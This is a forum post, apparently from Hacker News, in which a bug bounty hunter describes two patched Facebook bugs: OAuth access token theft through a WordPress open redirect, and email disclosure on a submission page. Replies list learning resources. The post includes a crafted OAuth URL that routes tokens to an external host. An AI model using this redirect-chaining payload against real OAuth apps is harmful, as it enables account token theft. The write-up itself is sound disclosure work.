
Facebook Awards 1000$ for 2 minor bugs - raushanrajjj
Since last two month i started reading about security vulnerabilities and give a try on facebook.com and found two minor bugs.<p>BUG #1 STEALING OAUTH ACCESS TOKEN (500$)<p>Introduction:
--------------
Facebook apps(including facebook internal apps) having redirect_url to wordpress comes under this attack.It was because of open redirection bug of wordpress sites<p>Steps:
-------<p>1. Facebook launched shemeansbusiness.fb.com (client_id=757713104362213).By Default redirect_url was https:&#x2F;&#x2F;staticxx.facebook.com&#x2F;connect&#x2F;xd_arbiter.php<p>2. App accept shemeansbusiness.fb.com domain in redirect_url and also fbshemeansbusiness.wordpress.com<p>3. So, I crafted a new url  :<p>https:&#x2F;&#x2F;www.facebook.com&#x2F;dialog&#x2F;oauth?display=page&amp;response_type=token&amp;fbconnect=1&amp;client_id=757713104362213&amp;redirect_uri=https%3A%2F%2Ffbshemeansbusiness.wordpress.com%2Fremote-login.php%3Faction%3Dlogout%26back=https:&#x2F;&#x2F;google.sttor.com<p>Here Redirect Url is :<p>https%3A%2F%2Ffbshemeansbusiness.wordpress.com%2Fremote-login.php%3Faction%3Dlogout%26back=https:&#x2F;&#x2F;google.sttor.com<p>4. So If any person  has pre authorized this app or use it first time using crafted url, the access token will be redirected to external websites(having google or wordpress keyword in domain)<p>5. Even techcrunch.com has open redirection and send access token to external websites<p>BUG #2: EMAIL DISCLOSURE of  users who submitted link on shemeansbusiness.fb.com. (500$)<p>Like this url was disclosing user email
https:&#x2F;&#x2F;shemeansbusiness.fb.com&#x2F;fbsmb_submission&#x2F;lea-rafferty&#x2F;<p>Both the bugs are patched immediately.Today facebook awards me total 1000$ for these two bugs
======
deluvas
Do you mind sharing the resources you've read about security vulnerabilities?

~~~
raushanrajjj
I only read the past bugs reported to google and facebook, and read in depth
about OAUTH.

1\. [http://homakov.blogspot.in/2013/02/hacking-facebook-with-
oau...](http://homakov.blogspot.in/2013/02/hacking-facebook-with-oauth2-and-
chrome.html)

2\. [http://www.nirgoldshlager.com/2013/02/how-i-hacked-
facebook-...](http://www.nirgoldshlager.com/2013/02/how-i-hacked-facebook-
oauth-to-get-full.html)

3\. [https://medium.com/@atom/a-simple-bug-on-facebook-that-is-
wo...](https://medium.com/@atom/a-simple-bug-on-facebook-that-is-
worth-8000-b77f7e01b064#.8d4nef1g4)

